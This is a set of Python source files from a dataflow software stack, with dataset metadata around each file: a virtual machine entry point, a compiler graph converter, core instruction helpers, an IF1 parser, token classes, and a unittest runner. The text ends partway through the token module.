"mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# main.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or 
substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package dvm\n# \\brief DVM Main file\n#\n# This module contains the entry point for DVM. It contains the\n# UI code, as well as the command line parser and exit handling.\n#\n# In short it bundles all the components of DVM together and it \n# allows the user to interact with these components.\n##\n\nimport log\nimport sys\nimport dot\nimport core\nimport read\nimport user\nimport signal\nimport argparse\nimport fileinput\nimport multiprocessing\n\n# --------------- #\n# Signal Handlers #\n# --------------- #\n\n## Handle an exit signal.\ndef handle_exit(signal, frame):\n\tsys.exit(user.EXIT_INTERRUPT)\n\n## Bind handle_exit to sigint.\nsignal.signal(signal.SIGINT, handle_exit)\n\n# ---------------------- #\n# Command line arguments #\n# ---------------------- #\n\nargParser = argparse.ArgumentParser(description = \"The Dataflow Virtual Machine.\")\nargParser.add_argument(\"path\", help = \"The path to the DIS file you want to run, - to use stdin\")\nargParser.add_argument(\"-i\", \"--input\", action = 'append', help = \"A value to pass to the program\")\nargParser.add_argument(\"-c\", \"--cores\", type = int, default = multiprocessing.cpu_count(), help = \"The number of cores to use\")\nargParser.add_argument(\"-ll\", \"--logLevel\", type = int, default = 50, help = \"Specify the log level\")\nargParser.add_argument(\"--dot\", action = \"store_true\", help = \"Generate a dot graph of the program\")\nargParser.add_argument(\"--dry_run\", action = \"store_true\", help = \"Don't run the program but abort after parsing the dis file.\")\n\nargs = argParser.parse_args()\n\n#args.logLevel = 0\n#args.path = \"../test/simple.dis\"\n#args.cores = 1\n#args.input = [\"1\",\"2\", \"3\", \"4\"]\n\n# ------------ #\n# Program Flow #\n# ------------ #\n\n# Set up logging.\nlog.setup(args.logLevel)\n\n# Parse the input files/stdin.\nfor line in fileinput.input(args.path):\n\tread.parseLine(line)\n\n# Generate a dot graph of the program\nif args.dot:\n\tdot.dot()\n\n# Abort if dry_run was specified.\nif args.dry_run:\n\tsys.exit(user.EXIT_OK)\n\n# Abort if we need extra input while \n# stdin is already bound to a pipe.\nif args.path == \"-\":\n\tif core.getIn() != len(args.input):\n\t\tprint \"Missing input, aborting...\"\n\t\tsys.exit(user.EXIT_INPUT)\n\n# Print the header text:\nif sys.stdout.isatty():\n\tprint \"DVM running on {} core(s).\".format(args.cores)\n\n# Start the cores.\ncore.start(args.cores)\n\n# Add command line arguments to runtime.\nif args.input:\n\tfor data in args.input:\n\t\tdata = read.parseValue(data)\n\t\tcore.addData(data)\n\n# Fetch the remaining input\nwhile not core.hasIn():\n\tif sys.stdin.isatty():\n\t\tdata = raw_input(\"> \")\n\telse:\n\t\tdata = raw_input(\"reading input for port {}...\\n\".format(core.getPort()))\n\tdata = read.parseValue(data)\n\tcore.addData(data)" }, { "alpha_fraction": 0.7279291152954102, "alphanum_fraction": 0.7331801652908325, "avg_line_length": 26.214284896850586, "blob_id": "42d015cd20fe94a22e0c4bb56405953f49dbd457", 
"content_id": "ab982af39ecbeefab7c947e14586459c1106e32b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3047, "license_type": "no_license", "max_line_length": 83, "num_lines": 112, "path": "/DISc/backEnd/DVM/graphConverter.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# graphConverter.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.graphconverter\n# \\brief IGR graph converter\n#\n# This module converts the entire graph\n# into DVM.\n#\n# \\todo\n#\tClean this up \n#\t\t- cleaner abstraction for not using first subgraph\n#\t\t- Type check for compound node type.\n##\n\nimport IGR\nimport dis\nimport IGR.node\nimport nodeConverter\nimport compoundConverter\n\n##\n# Add the contents of a collection of subGraphs\n# to a DIS program.\n#\n# \\param subGraphs\n#\t\tA list of subgraphs to compile.\n# \\param prog\n#\t\tThe DIS object to add the data to. 
\n##\ndef convertSubGraphs(subGraphs, prog):\n\tnodes = []\n\n\tdef nodeProc(node):\n\t\tif node.isCompound():\n\t\t\tcompoundConverter.convertNode(prog, node)\n\t\telse:\n\t\t\tnodeConverter.convertNode(prog, node)\n\t\tnodes.append(node)\n\n\tdef sgStart(sg):\n\t\tprog.addCommentLines(\"Starting subgraph %s\" % sg.name)\n\n\tdef sgStop(sg):\n\t\tprog.addNewlines()\n\n\t\tfor node in nodes:\n\t\t\tnodeConverter.addLinks(prog, node)\n\t\tfor node in nodes:\n\t\t\tnodeConverter.addLiterals(prog, node)\n\n\t\tprog.addCommentLines(\"Leaving subgraph %s\" % sg.name)\n\t\tprog.addNewlines()\n\n\t\tdel nodes[:]\n\n\tIGR.traverse(\n\t\tnodeProc, sgStart, sgStop, \n\t\tTrue, lambda x : None, lambda x : None,\n\t\tsubGraphs)\n\n##\n# Convert a collection of subGraphs\n# to a DIS program.\n#\n# \\param entryName\n#\t\tThe name of the entry point in the program.\n#\t\tThis subgraph will be linked to the entry and\n#\t\texit of the DVM program.\n##\ndef convert(entryName = 'main'):\n\tmain = IGR.getSubGraph(entryName).entry\n\tinputs = main.outputs\n\n\tif inputs == 0:\n\t\treturn \"TRIV <= %s\" % main.subGraph.value\n\n\tprog = dis.DIS(inputs)\n\tconvertSubGraphs(IGR.getSubGraphs(), prog)\n\n\t# Add an implicit call to main, which returns to the \n\t# program exit point.\n\tprog.addCommentLine(\"Implicit call to main\", 0)\n\tmainKey = prog.getToKey(main)\n\tmainCall = prog.addInstruction(0, 'CHN', [inputs, 1,mainKey[0], mainKey[1], 0, 1])\n\tprog.linkStart(mainCall)\n\n\treturn prog.generate()" }, { "alpha_fraction": 0.7277834415435791, "alphanum_fraction": 0.7291454076766968, "avg_line_length": 22.12598419189453, "blob_id": "a1bad1f2ce7deecca825b51a17676d1244b9b97f", "content_id": "b1aef37f673f53fe42e6bc77962b1d67795ad8ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5874, "license_type": "no_license", "max_line_length": 79, "num_lines": 254, "path": "/DVM/core/__init__.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core\n# \\brief Dataflow Virtual Machine\n# \n# This is the core of DVM. 
It contains the code that is necessary\n# to execute the program in instruction memory.\n#\n# This top level namespace also declares some convenience functions\n# to control the instruction memory and runtime.\n##\n\nimport instruction\nimport runtime\nimport memory\n\n##\n# Create an instruction and add it to memory.\n# \n# \\param constructor\n#\t\tThe instruction constructor\n# \\param argLst\n#\t\tThe arguments to pass to the constructor.\n#\t\tThe exact structure of this list depends on the\n#\t\tinstruction type.\n#\n# \\return \n#\t\tThe key of the newly added instruction.\n##\ndef _addInstruction(constructor, argLst = []):\n\tinst = constructor(*argLst)\n\treturn memory.add(inst)\n\n## \n# Add an operation instruction.\n#\n# \\param op\n#\t\tThe operation of this instruction.\n# \\param inputs\n#\t\tThe amount of inputs this instruction\n#\t\twill accept.\n#\n# \\return\n#\t\tThe key of the operation instruction.\n##\ndef addOperationInstruction(op, inputs):\n\treturn _addInstruction(\n\t\tinstruction.OperationInstruction,\n\t\t[op, inputs])\n\n##\n# Add a constant instruction.\n#\n# \\param value\n#\t\tThe value the constant should return.\n#\n# \\return \n#\t\tThe key of the constant instruction.\n## \ndef addConstant(value):\n\treturn _addInstruction(instruction.Constant, [value])\n\n##\n# Add a sink instruction.\n#\n# \\return\n#\t\tThe key of the sink instruction.\n##\ndef addSink():\n\treturn _addInstruction(instruction.Sink)\n\n##\n# Create a switch instruction.\n# \n# \\param dstList\n#\t\tThe list of the possible destinations.\n#\n# \\return \n#\t\tThe key of the switch instruction.\n##\ndef addSwitch(dstList):\n\treturn _addInstruction(instruction.Switch, [dstList])\n\n##\n# Add a context change instruction.\n#\n# \\param binds\n#\t\tThe amount of tokens to bind to a new\n#\t\tcontext.\n# \\param restores\n#\t\tThe amount of tokens the context will\n#\t\tproduce before being deleted.\n# \\param destSink\n#\t\tThe destination of the token after\n#\t\tthe context change.\n# \\param retSink\n#\t\tThe destination of the token\n#\t\tafter the context restore.\n#\n# \\return \n#\t\tThe key of the context change instruction.\n##\ndef addContextChange(binds, restores, destSink, retSink):\n\treturn _addInstruction(\n\t\tinstruction.ContextChange,\n\t\t[binds, restores, destSink, retSink])\n\n##\n# Add a split instruction.\n#\n# \\param binds\n#\t\tThe amount of inputs that the split will take.\n#\t\tA split should always take at least one argument,\n#\t\twhich is the array that will be split.\n# \\param dest\n#\t\tThe destination of the tokens after\n#\t\tthe context change.\n# \\param merge\n#\t\tThe instruction that will recreate\n#\t\tthe array after the context restore.\n# \\return\n#\t\tThe key of the context map instruction.\n##\ndef addSplit(binds, dest, merge):\n\treturn _addInstruction(\n\t\tinstruction.Split,\n\t\t[binds, dest, merge])\n\n##\n# Add a context restore instruction.\n#\n# \\return \n#\t\tThe key of the context restore instruction.\n##\ndef addContextRestore():\n\treturn _addInstruction(instruction.ContextRestore)\n\n##\n# Add a stop instruction.\n#\n# \\return\n#\t\tThe key of the stop instruction.\n##\ndef addStopInstruction():\n\treturn _addInstruction(instruction.StopInstruction)\n\n##\n# Add a destination to a given instruction.\n#\n# This only works on instruction::OperationInstruction \n# and on instruction::Sink\n#\n# \\param srcKey\n#\t\tThe key of the from instruction.\n# \\param srcPort\n#\t\tThe index of the from port.\n# \\param dstKey\n#\t\tThe 
key of the destination instruction.\n# \\param dstPort\n#\t\tThe index of the destination port.\n##\ndef addDestination(srcKey, srcPort, dstKey, dstPort):\n\tinst = memory.get(srcKey)\n\tinst.addDestination(srcPort, dstKey, dstPort)\n\n##\n# Add a literal to a given instruction.\n#\n# This only works on instruction::OperationInstruction\n# and on instruction:ContextChangeInstruction\n##\ndef addLiteral(key, port, val):\n\tinst = memory.get(key)\n\tinst.addLiteral(port, val)\n\n##\n# Start the execution cores.\n#\n# \\see runtime::init()\n##\ndef start(cores): runtime.start(cores)\n\n##\n# Add an external token containing data.\n#\n# \\see runtime::addData()\n##\ndef addData(data): runtime.addData(data)\n\n##\n# Add data to the core, that immediately \n# adds a stop token containing data.\n#\n# This can be used if the program does not require\n# any user input. \n#\n# \\see runtime::addTrivial()\n##\ndef addTrivial(data): runtime.addTrivial(data)\n\n##\n# Check the current port of the runtime.\n##\ndef getPort():\n\treturn runtime.__port__\n\n##\n# Return the amount of input the\n# runtime requires.\n##\ndef getIn():\n\treturn runtime.__in__\n\n##\n# Set the amount of inputs that the \n# runtime expects.\n##\ndef setIn(i):\n\truntime.__in__ = i\n\n##\n# See if the runtime expects additional input.\n#\n# \\return\n# \t\tTrue if the runtime has received all the\n#\t\trequired data.\n##\ndef hasIn(): \n\treturn getPort() >= getIn()\n" }, { "alpha_fraction": 0.3483572006225586, "alphanum_fraction": 0.5425442457199097, "avg_line_length": 31.094594955444336, "blob_id": "7a562b1ebdbf315de906e7f2a4bc9d52fb29dedc", "content_id": "e4ae243dc1b2c5baead7d797845e7af7b1461638", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2374, "license_type": "no_license", "max_line_length": 85, "num_lines": 74, "path": "/test/run.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# run.py\n# Mathijs Saey\n# DVM tests\n\n# This file compiles and runs the various example files\n\nimport unittest\nimport subprocess\n\nDVM_PATH = \"../DVM/dvm.py\"\nDISC_PATH = \"../DISc/disc.py\"\n\nclass Test(unittest.TestCase):\n\n\tdef compile(self, path):\n\t\tprint \"Compiling\", path\n\t\tsubprocess.check_call([DISC_PATH, path, '-d', DVM_PATH, '-ll', '40'])\n\n\tdef runDvm(self, path, inputs):\n\t\tprint \"Running\", path\n\t\targs = [DVM_PATH, path, '-ll', '40']\n\n\t\tfor e in inputs:\n\t\t\targs.append(\"-i\")\n\t\t\targs.append(str(e))\n\n\t\treturn subprocess.check_output(args).strip()\n\n\tdef abstract(self, name, inputs, expected):\n\t\tself.compile(name + '.sis')\n\t\tres = self.runDvm(name + '.dis', inputs)\n\t\tself.assertEqual(res, expected)\n\n\tdef test_fac(self): self.abstract('factorial', ['5'], '120')\n\tdef test_fib(self): self.abstract('fibonacci', ['10'], '55')\n\tdef test_call(self): self.abstract('call', ['1', '2'], '21')\n\tdef test_simple(self): self.abstract('simple', ['1', '2', '3', '4'], '10')\n\tdef test_trivial(self): self.abstract('trivial', [], '8')\n\tdef test_forin(self): self.abstract('forin', \n\t\t['5', '10', '[5, 10, 30, 3, 40]', '[4, 20, 5]'],\n\t\t'[13, 11, 12, 13, 12, 45, 55, 35, 20, 21, 22, 23, 24, 25]')\n\n\tdef test_sort(self): self.abstract('sort',\n\t\t[('['\n\t\t\t'50, 92, 29, 63, 88, 3, 33, 49, 52, 27, 32, 86, 73, 97, 100, 49, 37, 86, 87, 76,'\n\t\t\t'50, 51, 95, 14, 89, 35, 39, 6, 93, 61, 55, 15, 12, 35, 39, 45, 24, 20, 19, 34,'\n\t\t\t'33, 39, 75, 80, 33, 41, 8, 89, 
37, 99, 23, 69, 21, 98, 16, 91, 64, 40, 89, 67,'\n\t\t\t'91, 13, 18, 3, 42, 69, 75, 42, 12, 48, 53, 58, 8, 57, 70, 97, 11, 1, 74, 71,'\n\t\t\t'78, 57,28, 100, 46, 9, 4, 96, 91, 18, 32, 1, 86, 80, 81, 55, 3, 20, 60, 91,'\n\t\t\t']')],\n\t\t('['\n\t\t\t'1, 1, 3, 3, 3, 4, 6, 8, 8, 9, 11, 12, 12, 13, 14, 15, 16, 18, 18, 19, '\n\t\t\t'20, 20, 21, 23, 24, 27, 28, 29, 32, 32, 33, 33, 33, 34, 35, 35, 37, 37, 39, 39, '\n\t\t\t'39, 40, 41, 42, 42, 45, 46, 48, 49, 49, 50, 50, 51, 52, 53, 55, 55, 57, 57, 58, '\n\t\t\t'60, 61, 63, 64, 67, 69, 69, 70, 71, 73, 74, 75, 75, 76, 78, 80, 80, 81, 86, 86, '\n\t\t\t'86, 87, 88, 89, 89, 89, 91, 91, 91, 91, 92, 93, 95, 96, 97, 97, 98, 99, 100, 100'\n\t\t']'))\n\n\tdef test_select(self): \n\t\tself.compile('select.sis')\n\n\t\tin_out = [\n\t\t\t(['5', '2'], '3'),\n\t\t\t(['0', '2'], '4'),\n\t\t\t(['1', '2'], '3')\n\t\t]\n\n\t\tfor pair in in_out:\n\t\t\tres = self.runDvm('select.dis', pair[0])\n\t\t\tself.assertEqual(res, pair[1])\n\nunittest.main()" }, { "alpha_fraction": 0.7194267511367798, "alphanum_fraction": 0.7213375568389893, "avg_line_length": 23.344961166381836, "blob_id": "18f4411a9903965771bd9fb2f7156c1e426c6d6a", "content_id": "0541444d973de0aa1eb0decb510dd6812db9a04d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6280, "license_type": "no_license", "max_line_length": 79, "num_lines": 258, "path": "/DISc/IGR/__init__.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR\n# \\author Mathijs Saey\n# \n# \\brief DVM Intermediate Graph Representation\n#\n# This python module contains the DVM intermediate form, called \n# Intermediate Graph Representation (IGR).\n#\n# The general idea behind IGR is that it doesn't know anything about the\n# outside world. It is only a graph representation that can be modified by\n# both the front and the backend. 
However, IGR should not depend on either\n# the front or backend; instead, IGR should be rich enough to work with \n# a variety of front and backends.\n# \n# This module should be considered the stable interface of this package;\n# external modules (such as parsers) should only use these functions\n# to create and modify the IGR.\n#\n# This module also exports 2 functions, dot::dot() and traverse::traverse()\n##\n\nimport node\nimport graph\nimport literal\nimport subgraph\n\nfrom dot import dot\nfrom traverse import traverse\n\n# ----- #\n# Graph #\n# ----- #\n## \\name Graph\n## \\{\n\n##\n# Get a list of all the non-compound subgraphs\n# in the program.\n#\n# \\return \n#\t \tAll the non compound subgraphs in the program.\n## \ndef getSubGraphs(): \n\treturn graph.getSubGraphs()\n\n##\n# Get a subgraph by name.\n#\n# \\param name\n#\t\tThe name of the subgraph \n# \t\twe want to retrieve.\n# \\return\n#\t\tThe subgraph\n##\n\ndef getSubGraph(name):\n\treturn graph.getSubGraph(name)\n\n##\n# Remove a subgraph from the program.\n# This only works for subgraphs that are\n# not a part of a compound node.\n# Care should be taken to avoid calling this method\n# while iterating over the subgraph list.\n#\n# \\param subGraph\n#\t\tA reference to the subgraph to remove.\n##\ndef removeSubGraph(subGraph):\n\tgraph.removeSubGraph(subGraph)\n\n##\\}\n\n# --------- #\n# SubGraphs #\n# --------- #\n## \\name Subgraphs\n## \\{\n\n##\n# Create a new subgraph\n#\n# \\param inputs\n#\t\tThe amount of inputs the subgraph accepts\n# \\param outputs\n# \t\tThe amount of data the subgraph returns\n# \\return\n# \t\tThe subgraph. Its entry and exit fields\n#\t\tshould be used to access parameters and\n#\t\treturn values of this subgraph.\n#\ndef createGeneralSubGraph(name, inputs, outputs, isFunc):\n\tsubGraph = subgraph.SubGraph(None, None, name, isFunc)\n\tentry = node.SubGraphEntryNode(subGraph, inputs)\n\texit = node.SubGraphExitNode(subGraph, outputs)\n\tsubGraph.entry = entry\n\tsubGraph.exit = exit\n\tsubGraph.addNode(entry)\n\tsubGraph.addNode(exit)\n\treturn subGraph\n\n##\n# Create a subgraph and add it to the program graph.\n##\ndef createSubGraph(name, inputs, outputs):\n\tsubGraph = createGeneralSubGraph(name, inputs, outputs, True)\n\tgraph.addSubGraph(subGraph)\n\tgraph.bindName(subGraph)\n\treturn subGraph\n \n##\n# Create a subgraph for a compound node.\n##\ndef createCompoundSubGraph():\n\treturn createGeneralSubGraph(None, 0, 0, False)\n\n##\\}\n\n# ----- #\n# Nodes #\n# ----- #\n## \\name Nodes\n## \\{\n\n##\n# Create a node, add it to its subgraph\n# and return it.\n#\n# \\param constructor\n#\t\tThe constructor to create the node.\n# \\param subGraph\n#\t\tThe subgraph that contains this node.\n# \\param arguments\n#\t\tThe arguments to pass to the constructor\n#\t\t(not including the subgraph)\n##\ndef createNode(constructor, subGraph, arguments = []):\n\targs = [subGraph] + arguments\n\tnode = constructor(*args)\n\tsubGraph.addNode(node)\n\treturn node\n\n##\n# Create an operation node\n#\n# \\param subGraph\n#\t\tThe subGraph that this node is part of\n#\n# \\param operation\n#\t\tThe operation that this node performs\n##\ndef createOperationNode(subGraph, operation):\n\treturn createNode(node.OperationNode, subGraph, [operation])\n\n##\n# Create a Compound node\n#\n# \\param type\n#\t\tThe type of the compound node (e.g. 
" }, { "alpha_fraction": 0.6928867101669312, "alphanum_fraction": 0.6996612548828125, "avg_line_length": 24.075471878051758, "blob_id": "01eeea58397384a1681988c93faf25b0fa622995", "content_id": "ae726e82273b34980a5eedb6a8b25e5a43d705c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2657, "license_type": "no_license", "max_line_length": 79, "num_lines": 106, "path": "/DISc/frontEnd/IF1/__init__.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \package frontEnd.IF1\n# \author Mathijs Saey\n# \n# \brief DISc IF1 Parser.\n#\n# This module parses [IF1](\ref IF1) files and converts them to IGR.\n##\n\nimport type\nimport edge\nimport graph\nimport converter\n\nimport logging\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.WARNING)\n\n# ------ #\n# Parser #\n# ------ #\n\n## Skip a line #\ndef skipLine(str, ctr): pass\n\n##\n# Line types and the functions to call when\n# they are encountered\n##\n__FUNCTIONS__ = {\n\t'C' : skipLine,\n\t'T' : type.parseType,\n\t'E' : edge.parseEdge,\n\t'L' : edge.parseLiteral,\n\t'N' : graph.parseNode,\n\t'G' : graph.parseGraph,\n\t'X' : graph.parseGraph,\n\t'{' : graph.parseCompoundStart,\n\t'}' : graph.parseCompoundEnd\n}\n\n##\n# Parse a single if1 line.\n#\n# \param line\n#\t\tThe string of the line to parse\n# \param ctr\n#\t\tThe line number of the current line,\n#\t\tused for error handling.\n##\ndef parseLine(line, ctr = \"?\"):\n\tlog.debug(\"Parsing line: %s\", line)\n\tarr = line.split()\n\tkey = line[0]\n\ttry:\n\t\tfunc = __FUNCTIONS__[key]\n\texcept KeyError:\n\t\tlog.warning(\"Line %s, Unrecognized line type: %s\", ctr, key)\n\texcept Exception, e:\n\t\tlog.error(\"Line %s, Exception %s while parsing: '%s'\", ctr, e, line)\n\telse:\n\t\tfunc(arr, ctr)\n\n##\n# Parse a complete IF1 string.\n# This function simply splits the file \n# based on the newlines and passes each\n# line to parseLine()\n#\n# \param str\n#\t\tThe string\n##\ndef fromString(str):\n\tctr = 1\n\tlines = str.split(\"\\n\")\n\tfor line in lines:\n\t\tif len(line) != 0:\n\t\t\tparseLine(line, ctr)\n\t\tctr += 1\n\tconverter.run()" }, { "alpha_fraction": 0.6946734189987183, "alphanum_fraction": 0.698478102684021, "avg_line_length": 28.203702926635742, "blob_id": "e4bb851e4dfe9f0b68d0ee897f930f509abeb812", "content_id": "8953f5c59f9330798d147e0aab43b11b3e07f226", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3154, "license_type": "no_license", "max_line_length": 85, "num_lines": 108, "path": "/DVM/core/token.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# token.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \package core.token\n# \brief DVM Tagged tokens\n# \n# This module defines the various tokens that \n# carry the state of the program.\n##\n
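\n# A small construction sketch (illustrative only, not part of the original\n# file); it shows how the classes defined below fit together:\n#\n#   tag = Tag((0, 2), 1, 0)  # destination instruction (0, 2), port 1, context 0\n#   tok = Token(42, tag)\n#   print tok                # => <| '42' [inst (0, 2) | port 1 | cont 0 ] |>\n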
\n##\n# Represents a DVM token.\n# A token carries program data and a Tag.\n# The tag contains all the \"meta\" information about\n# the token, such as its destination and context.\n##\nclass Token(object):\n\tdef __init__(self, datum, tag):\n\t\tsuper(Token, self).__init__()\n\t\tself.datum = datum\n\t\tself.tag = tag\n\n\tdef __str__(self):\n\t\ttagString = \"[\" + str(self.tag) + \"]\"\n\t\tdataString = \"'\" + str(self.datum) + \"'\"\n\t\treturn \"<| \" + dataString + \" \" + tagString + \" |>\"\n\n##\n# Represents a tag.\n# A tag contains the meta information about\n# a token.\n##\nclass AbstractTag(object):\n\tdef isStop(self):\n\t\traise NotImplementedError(\"Abstract method\")\n\n##\n# Standard tag.\n# A standard tag contains the destination\n# (instruction and port) of a token as well as its context.\n#\n# Conceptually, a tag has 2 parts:\n# * A static part, its port and instruction, which are part of the program\n# * A dynamic part, its core and context, which are dynamically assigned at runtime.\n##\nclass Tag(AbstractTag):\n\tdef __init__(self, inst, port, cont):\n\t\tsuper(Tag, self).__init__()\n\t\tself.cont = cont\n\t\tself.port = port\n\t\tself.inst = inst\n\n\tdef __str__(self):\n\t\tinst = \"inst 